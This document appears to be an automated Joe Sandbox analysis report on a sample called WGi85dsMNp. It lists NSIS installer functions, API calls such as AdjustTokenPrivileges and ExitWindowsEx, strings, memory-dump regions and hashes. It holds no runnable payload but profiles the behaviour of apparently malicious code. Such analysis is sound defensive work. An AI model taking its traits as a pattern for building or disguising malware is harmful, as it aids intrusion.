DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 0040374E

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
ExitProcess.KERNEL32 ref: 0040383A
lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
CopyFileW.KERNEL32(00438800,00420EE8,?,?,00000006,00000008,0000000A), ref: 004038FD
CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
OpenProcessToken.ADVAPI32(00000000), ref: 00403960
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
AdjustTokenPrivileges.ADVAPI32 ref: 00403998
ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
ExitProcess.KERNEL32 ref: 004039E0

Strings

Error launching installer, xrefs: 004037D0
~nsu, xrefs: 00403845
TMP, xrefs: 00403735
NSIS Error, xrefs: 00403567
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004034BC
Low, xrefs: 0040371B
.tmp, xrefs: 00403861
SeShutdownPrivilege, xrefs: 0040396F
TEMP, xrefs: 0040372D
UXTHEME, xrefs: 004034F5, 004034FA, 00403500
\Temp, xrefs: 004036FF

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-334447862
Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404DE4
GetDlgItem.USER32(?,00000408), ref: 00404DEF
GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
LoadBitmapW.USER32(0000006E), ref: 00404E4C
SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
DeleteObject.GDI32(00000000), ref: 00404EC2
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
ShowWindow.USER32(?,00000005), ref: 0040501C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
ImageList_Destroy.COMCTL32(?), ref: 004051EC
GlobalFree.KERNEL32(?), ref: 004051FC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
InvalidateRect.USER32(?,00000000,?), ref: 0040534D
ShowWindow.USER32(?,00000000), ref: 0040539B
GetDlgItem.USER32(?,000003FE), ref: 004053A6
ShowWindow.USER32(00000000), ref: 004053AD

Strings

N, xrefs: 00405057
, xrefs: 00405385
M, xrefs: 00404F76

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

Function 35A9AFF8 Relevance: 23.0, Strings: 18, Instructions: 461COMMON

Download Yara Rule

Strings

0o@p, xrefs: 35A9B147
Lj@p, xrefs: 35A9B3B9
PH]q, xrefs: 35A9B345
Lj@p, xrefs: 35A9B2AB
Lj@p, xrefs: 35A9B3A3
Lj@p, xrefs: 35A9B2C1
Lj@p, xrefs: 35A9B498
PH]q, xrefs: 35A9B51E
PH]q, xrefs: 35A9B43D
PH]q, xrefs: 35A9B429
Lj@p, xrefs: 35A9B4AE
PH]q, xrefs: 35A9B62D
", xrefs: 35A9B7CE
Lj@p, xrefs: 35A9B5A6
PH]q, xrefs: 35A9B532
PH]q, xrefs: 35A9B331
Lj@p, xrefs: 35A9B590
PH]q, xrefs: 35A9B619

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: "$0o@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
API String ID: 0-1947560563
Opcode ID: 31997e9385a4362904867054666d8c64b9fe5627e53888d463745529cd24de3c
Instruction ID: 3ce36c61d4762fcc1c6e674ab415442093bb23feedfa46b29bb29231b88636b1
Opcode Fuzzy Hash: 31997e9385a4362904867054666d8c64b9fe5627e53888d463745529cd24de3c
Instruction Fuzzy Hash: 5F327D74A012288FDB58DF69C994BDDBBF2BF89300F1080A9D909A7361DB759E85DF10

Function 00405AFA Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,00437800,75922EE0,00000000), ref: 00405B23
lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,75922EE0,00000000), ref: 00405B6B
lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,75922EE0,00000000), ref: 00405B8E
lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,75922EE0,00000000), ref: 00405B94
FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,75922EE0,00000000), ref: 00405BA4
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
FindClose.KERNEL32(00000000), ref: 00405C53

Strings

\*.*, xrefs: 00405B65
0WB, xrefs: 00405B53

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: 0WB$\*.*
API String ID: 2035342205-351390296
Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE

Function 35A9AFF7 Relevance: 12.9, Strings: 10, Instructions: 361COMMON

Download Yara Rule

Strings

0o@p, xrefs: 35A9B147
PH]q, xrefs: 35A9B51E
PH]q, xrefs: 35A9B43D
PH]q, xrefs: 35A9B345
PH]q, xrefs: 35A9B429
PH]q, xrefs: 35A9B62D
", xrefs: 35A9B7CE
PH]q, xrefs: 35A9B532
PH]q, xrefs: 35A9B331
PH]q, xrefs: 35A9B619

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: "$0o@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
API String ID: 0-455001714
Opcode ID: 82c72ab26ab5dbb68fb638f338c521ed01749784ff7ff457ca61b238a3c85994
Instruction ID: 77ea6dab67c348db02ed51537b166c90664d90c2666e22c059b7b45bb566d5c1
Opcode Fuzzy Hash: 82c72ab26ab5dbb68fb638f338c521ed01749784ff7ff457ca61b238a3c85994
Instruction Fuzzy Hash: EC028BB4E012188FDB58DF69C994B9DBBF2BF89300F1081A9D809A7365DB759E85CF10

Function 35DFD608 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 396COMMON

Download Yara Rule

Strings

$z5, xrefs: 35DFD76E
$z5, xrefs: 35DFDA14
$z5, xrefs: 35DFDA20
$z5, xrefs: 35DFD762
<04, xrefs: 35DFDAD0

Memory Dump Source

Source File: 00000002.00000002.3944389815.0000000035DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35df0000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: $z5$$z5$$z5$$z5$<04
API String ID: 0-974276758
Opcode ID: 5ba61a5774a6c28040cb9fd86adca9fa7bd4098009f01c668437eb939ec7f376
Instruction ID: 72e926f9f7cd82e9937916a2d4d7a8e741b2ad3b6407605c464e8bb7b0f6886c
Opcode Fuzzy Hash: 5ba61a5774a6c28040cb9fd86adca9fa7bd4098009f01c668437eb939ec7f376
Instruction Fuzzy Hash: 32F14C75A00309CFEB04EFA9C848B9DBBF1FF48304F168559D409AB269DB76E945CB90

Function 00406AF2 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45

Function 0040672B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,75922EE0,00405B1A,?,00437800,75922EE0), ref: 00406736
FindClose.KERNEL32(00000000), ref: 00406742

Strings

xgB, xrefs: 0040672C

Memory Dump Source

Source File: 00000002.00000002.3920528178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3920506738.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920548188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920566035.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3920594312.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: xgB
API String ID: 2295610775-399326502
Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

Function 35A97B63 Relevance: 3.1, Strings: 2, Instructions: 594COMMON

Download Yara Rule

Strings

.5uq, xrefs: 35A97C7B
BL5, xrefs: 35A983D4

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: .5uq$BL5
API String ID: 0-863464203
Opcode ID: 7c20ab5a7432ca6cac668e10537249a4984cc01ac397c37fade61af5b943e63c
Instruction ID: feec4d71a373fba15cf5d53491aa59be4444663095d115bb4caf5dbe1654cf3a
Opcode Fuzzy Hash: 7c20ab5a7432ca6cac668e10537249a4984cc01ac397c37fade61af5b943e63c
Instruction Fuzzy Hash: 1E52AB74A01269CFDB68DF65C880BDDBBB2BF89301F1085E9D809A7255DB359E82CF50

Function 35A943C8 Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

o2Tp2, xrefs: 35A94452

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: o2Tp2
API String ID: 0-3051055014
Opcode ID: 333fee00eda337c81e8aa9fc0fb48cabb0345df2b85cd562e114ee3f14c3a3aa
Instruction ID: 664551e5cf078b466949bbe3b7cd1a6c79704d6d433ccae6b1bb1af8c42192d3
Opcode Fuzzy Hash: 333fee00eda337c81e8aa9fc0fb48cabb0345df2b85cd562e114ee3f14c3a3aa
Instruction Fuzzy Hash: F5C18174E00258CFDB58DFA5C994B9DBBB2BF89300F1081A9D809AB365DB359D86CF10

Function 35A98193 Relevance: 1.4, Strings: 1, Instructions: 193COMMON

Download Yara Rule

Strings

BL5, xrefs: 35A983D4

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: BL5
API String ID: 0-1379835122
Opcode ID: caa3c7a21abe98f056a43de1fee7afc2b63d799b7513b7c0a2186b3601d46f71
Instruction ID: 089c44510f81a5e7004a32a1b9c3b2b6234f04dc4defbfb81944c529ef89eee8
Opcode Fuzzy Hash: caa3c7a21abe98f056a43de1fee7afc2b63d799b7513b7c0a2186b3601d46f71
Instruction Fuzzy Hash: 53A1A074A01229CFDB68DF64C954BDABBB2BF4A301F1085E9D40EA7260DB319E81CF51

Function 35A98373 Relevance: 1.4, Strings: 1, Instructions: 116COMMON

Download Yara Rule

Strings

BL5, xrefs: 35A983D4

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID: BL5
API String ID: 0-1379835122
Opcode ID: 3fef57f76c8d4853ae73db5fd5fe3f4bc0cf8c429473b37853a42c06e4211d88
Instruction ID: b558bc4186a261e38bb07b203636bbab68647eb50cd8a2eafc13f7534a9db935
Opcode Fuzzy Hash: 3fef57f76c8d4853ae73db5fd5fe3f4bc0cf8c429473b37853a42c06e4211d88
Instruction Fuzzy Hash: 12518F74A01229DFDB68DF24C954BDAB7B2BF4A305F5085E9D80AA7350CB359E82CF50

Function 354BBD88 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b345db0f08286232423e5c76a600b71baea5c3f63dcef0b7d498e4b61e504d1
Instruction ID: cba980540b9f4ba97657c8a32b0b3d92171bb138875538635d86a037418f861e
Opcode Fuzzy Hash: 7b345db0f08286232423e5c76a600b71baea5c3f63dcef0b7d498e4b61e504d1
Instruction Fuzzy Hash: 1AC19174E01218CFDB58DFA5C994B9DBBB2AF89300F1081A9D809BB365DB759D86CF10

Function 354BE790 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6713ebc69e776e86507db5be8140a1d58bff2056d7e0c4f903442a43a270cef
Instruction ID: 7cac0af7478950ae0123190a805e28f2baf6e1ac2ac7d221997caa5b93c01dc1
Opcode Fuzzy Hash: f6713ebc69e776e86507db5be8140a1d58bff2056d7e0c4f903442a43a270cef
Instruction Fuzzy Hash: 6EC19374E00258CFDB58DFA5C994B9DBBB2BF89300F1081A9D809AB365DB755E86CF10

Function 354BEBF7 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5566587a4ccdf1216dc9bfc0cdee7ac89ad49b2af0d138746809e78c624e560a
Instruction ID: 0d1be413ffbab3f2bb8e29925c49f83cbde076c0a0ee09f1f2ede04a5f0b5e74
Opcode Fuzzy Hash: 5566587a4ccdf1216dc9bfc0cdee7ac89ad49b2af0d138746809e78c624e560a
Instruction Fuzzy Hash: 30C19374E00258CFDB58DFA5C994B9DBBB2BF89300F1081A9D409AB365DB759D86CF10

Function 35A94DB0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60358d795d7277a63761f93120aa8f18b61b3bc04ae3ff4f39ee19ca59424c74
Instruction ID: 1820cc7eaeb152864585ed16fd13563235e125ae5c40f8f19eb27ab4ba9f7e6d
Opcode Fuzzy Hash: 60358d795d7277a63761f93120aa8f18b61b3bc04ae3ff4f39ee19ca59424c74
Instruction Fuzzy Hash: CCC18174E00258CFDB58DFA5C954B9DBBF2BF89300F2081A9D809AB265DB359D86CF50

Function 35A92560 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7914c6ecd016b9a528d5ffca54b651fb77660956adab6906d27ae57554684f03
Instruction ID: 8b54525e1b7549eaf0cfbe8ea23e2e4befe99bf9e3eb7e6687a7b0d89b30b73a
Opcode Fuzzy Hash: 7914c6ecd016b9a528d5ffca54b651fb77660956adab6906d27ae57554684f03
Instruction Fuzzy Hash: 96C19174E00218CFDB58DFA5C994B9DBBB2AF89300F5080A9D809AB365DB359D86CF10

Function 35A91CB0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c79cc4a6b184e7811940e16204591d5173b032dc5210f9788ab30cfe9f2491f
Instruction ID: 0975d9eb7dfce0cca5b42854661581c545f41f316f10374ed77573162c55de3a
Opcode Fuzzy Hash: 0c79cc4a6b184e7811940e16204591d5173b032dc5210f9788ab30cfe9f2491f
Instruction Fuzzy Hash: 7BC19174E00258CFDB58DFA5C994B9DBBB2BF89300F1081A9D809AB365DB355D86CF50

Function 35A974C8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cde692b74eabfe9154775847e313337d205354a0434792f0f53711193ffa29b5
Instruction ID: a4e73b98decf2ad659aaeace649f3f8c009f45a67446e205f93c662c77934078
Opcode Fuzzy Hash: cde692b74eabfe9154775847e313337d205354a0434792f0f53711193ffa29b5
Instruction Fuzzy Hash: A0C18174E00218CFDB58DFA5C994B9DBBB2BF89301F5080A9D809AB365DB359D86CF50

Function 35A96C18 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 663f0663e44c409d57df1da52217e40105a9615a4ad96feaf393c907bb1b95d3
Instruction ID: 55dae5147cf587d498bc9d87f4b98be2ead7eb2d7b10a095c7e77871d4d50b44
Opcode Fuzzy Hash: 663f0663e44c409d57df1da52217e40105a9615a4ad96feaf393c907bb1b95d3
Instruction Fuzzy Hash: 5EC18274E00258CFDB59DFA5C994B9DBBB2BF89300F1080A9D809AB365DB359D86CF50

Function 35A90FA8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1a16d0cc541fec770f28fa5ece88cac6a1a06a79dc67250feb3e74a6f0e4abf
Instruction ID: 5e8f08db0178ee1e257b40f241e5252eb452146dcc0e2d474c6c93ccd387d9e8
Opcode Fuzzy Hash: e1a16d0cc541fec770f28fa5ece88cac6a1a06a79dc67250feb3e74a6f0e4abf
Instruction Fuzzy Hash: C5C18274E00258CFDB54DFA5C954B9DBBB2BF89300F1081A9D809AB365DB359D86CF50

Function 35A967C0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71c415cf82ed56519aab0d41ec32a2d9eed1aa15bad3df139cb6e64cd64e8083
Instruction ID: 5e42d6d271c47baa76e945d9dda42d7a3d6be82c5a8128a666a536ce39bfc4bc
Opcode Fuzzy Hash: 71c415cf82ed56519aab0d41ec32a2d9eed1aa15bad3df139cb6e64cd64e8083
Instruction Fuzzy Hash: DEC19274E01218CFDB58DFA5C954B9DBBB2BF89300F1081A9D809AB365DB359E86CF50

Function 35A95F10 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74c587730b7efad63b409058dafd6f1d2ce6df2b43b8c50c7d254968b9447a16
Instruction ID: 8435cfc63433b5aaf8ff70ca471e66d1c709aead52bf9e329ab23e333b3b059a
Opcode Fuzzy Hash: 74c587730b7efad63b409058dafd6f1d2ce6df2b43b8c50c7d254968b9447a16
Instruction Fuzzy Hash: CEC18274E00218CFDB58DFA5C994B9DBBB2BF89300F5081A9D809AB365DB359D86CF50

Function 35A93F70 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cca0f3ee2af7d04314b36b7413cc5e370b69eab3488fa5dc2fdae5fad70ac05b
Instruction ID: e0845fbf581c3d1e05d93baaf07326c0e6c90c5c19e842da801653a8757e175c
Opcode Fuzzy Hash: cca0f3ee2af7d04314b36b7413cc5e370b69eab3488fa5dc2fdae5fad70ac05b
Instruction Fuzzy Hash: 62C18074E01218CFDB58DFA5C994B9DBBB2BF89300F1081A9D809AB365DB359D86CF50

Function 35A936C0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false

Joe Sandbox IDA Plugin

